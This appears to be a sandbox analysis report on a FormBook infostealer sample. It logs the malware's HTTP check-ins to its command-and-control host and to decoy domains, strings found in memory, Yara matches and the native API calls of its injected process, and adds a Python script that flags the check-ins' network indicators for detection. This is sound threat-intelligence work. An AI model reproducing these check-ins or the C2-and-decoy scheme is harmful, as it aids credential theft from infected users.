Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1 | Host: www.ecofingers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1 | Host: www.invisiongc.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.findfoodshop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1 | Host: www.scuolatua.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1 | Host: www.okinawarongnho.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.jorgeporcayo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: unknown | DNS traffic detected: queries for: www.aizaibali.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private | Content-Type: text/html; charset=utf-8 | Server: Microsoft-IIS/8.5 | X-Powered-By: ASP.NET | Date: Thu, 22 Jul 2021 15:44:03 GMT | Connection: close | Content-Length: 5045 | Data: the hex body printed in the original decodes to the standard IIS 8.5 "Detailed Error - 404.0 - Not Found" XHTML page (it begins <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" and carries the title "IIS 8.5 Detailed Error - 404.0 - Not Found" followed by the page's inline CSS)
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmp | String found in binary or memory: http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
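The check-ins above are byte-for-byte the same shape whether they go to the configured C2 (www.extinctionbrews.com/dy8g/) or to one of the decoy domains from the configuration, and the three ET Snort rules fired on four different destinations without distinguishing them. Only the extracted configuration tells the real C2 apart; the decoys are third-party domains that just receive the same request (the IIS 404 captured above is the kind of answer such a host returns, although the report does not say which host sent it). The block below is an added example, not part of the report: it parses the captured check-ins, flags the protocol oddities a network rule can key on (GET carrying a seven-byte NUL body, no User-Agent header, Connection: close, a base64-looking query value), and uses the configuration to label each destination as C2 or decoy. The request bytes are re-typed from the "HTTP traffic detected" lines; the decoy list is cut down to the domains seen in the traffic; no header beyond the two shown is assumed.

```python
"""Triage of the captured FormBook check-ins against the extracted configuration.

Added example; not part of the sandbox report. Requests are re-typed from
the report's HTTP lines (request line, Host, Connection, seven 0x00 bytes);
the configuration is the report's JSON with the decoy list shortened.
"""
import json
import re
from urllib.parse import urlsplit

CONFIG = json.loads("""{"C2 list": ["www.extinctionbrews.com/dy8g/"],
 "decoy": ["doityourselfism.com", "ecofingers.com", "invisiongc.net",
           "findfoodshop.com", "scuolatua.com", "okinawarongnho.com",
           "jorgeporcayo.com"]}""")


def _request(host: str, blob: str) -> bytes:
    """One check-in exactly as printed in the report (constructed bytes)."""
    head = (f"GET /dy8g/?i0GDM={blob}&0X=C6Ah3vPx HTTP/1.1\r\n"
            f"Host: {host}\r\nConnection: close\r\n\r\n")
    return head.encode("ascii") + b"\x00" * 7


REQUESTS = [
    _request("www.extinctionbrews.com",
             "DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA=="),
    _request("www.doityourselfism.com",
             "Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw=="),
    _request("www.invisiongc.net",
             "MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A=="),
    _request("www.scuolatua.com",
             "DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg=="),
]

BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers, raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii").split("\r\n")
    method, target, _version = lines[0].split(" ")
    headers = {k.lower(): v for k, v in
               (line.split(": ", 1) for line in lines[1:])}
    return {"method": method, "target": target, "headers": headers, "body": body}


def checkin_indicators(req: dict) -> list:
    """Protocol-level oddities of these check-ins, independent of any domain list."""
    flags = []
    if "user-agent" not in req["headers"]:
        flags.append("no_user_agent")
    if req["method"] == "GET" and req["body"]:
        flags.append("get_with_body")
    if req["headers"].get("connection", "").lower() == "close":
        flags.append("connection_close")
    query = urlsplit(req["target"]).query
    # Split by hand: parse_qsl would turn '+' into a space and spoil the check.
    params = [p.split("=", 1) for p in query.split("&") if p]
    if any(len(kv) == 2 and BASE64ISH.match(kv[1]) for kv in params):
        flags.append("base64_like_query_value")
    return flags


def _bare(host: str) -> str:
    return host[4:] if host.startswith("www.") else host


def classify_checkins(config: dict, requests) -> list:
    """Label each captured check-in as the configured C2, a decoy, or unknown."""
    c2 = {}
    for entry in config["C2 list"]:
        u = urlsplit("http://" + entry)
        c2[_bare(u.hostname.lower())] = u.path
    decoys = {_bare(d.lower()) for d in config["decoy"]}
    results = []
    for raw in requests:
        req = parse_request(raw)
        host = req["headers"]["host"].lower()
        path = urlsplit(req["target"]).path
        if _bare(host) in c2 and path == c2[_bare(host)]:
            role = "c2"
        elif _bare(host) in decoys:
            role = "decoy"
        else:
            role = "unknown"
        results.append({"host": host, "role": role,
                        "flags": checkin_indicators(req)})
    return results


if __name__ == "__main__":
    for r in classify_checkins(CONFIG, REQUESTS):
        print(f"{r['role']:6} {r['host']:26} {','.join(r['flags'])}")
```

The split matters operationally: the indicator flags are what a proxy or IDS rule should match, because they fire on every check-in, while blocking and attribution should be limited to the "c2" host, since the decoy domains belong to unrelated sites and will also appear, with the same URI, in any other victim's traffic.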

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_004181D0 NtCreateFile
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00418280 NtReadFile
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00418300 NtClose
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_004183B0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00418222 NtCreateFile
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_004183AA NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A998F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A999A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A995D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A996E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A997A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A998A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99820 NtEnumerateKey
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A9B040 NtSuspendThread
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A999D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99950 NtQueueApcThread
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A99A10 NtQuerySection
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F96D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F95D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035FA770 NtOpenThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035FA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035FA3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9A10 NtQuerySection
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9A20 NtResumeThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9560 NtWriteFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035FAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F99D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035FB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035F98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB81D0 NtCreateFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB8280 NtReadFile
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB8300 NtClose
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EB8222 NtCreateFile
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0040102E
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041B8FB
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00408C6C
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00408C70
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041B57A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00402D88
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_0041C58A
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A820A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00B220A8
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A6B090
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00B11002
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A74120
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 1_2_00A5F900
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035EEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035D6E30
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_03681D55
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035BF900
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035B0D20
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035C841F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_03671002
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035CB090
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBB8FB
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EA8C6C
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EA8C70
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBC58A
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EA2D88
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EA2D90
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EBB57A
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 7_2_00EA2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 035BB150 appears 35 times
          Source: v8kZUFgdD4.exe, 00000000.00000003.333171421.0000000002486000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.389800702.000000000060E000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameipconfig.exej% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe, 00000001.00000002.390529849.0000000000CDF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs v8kZUFgdD4.exe
          Source: v8kZUFgdD4.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
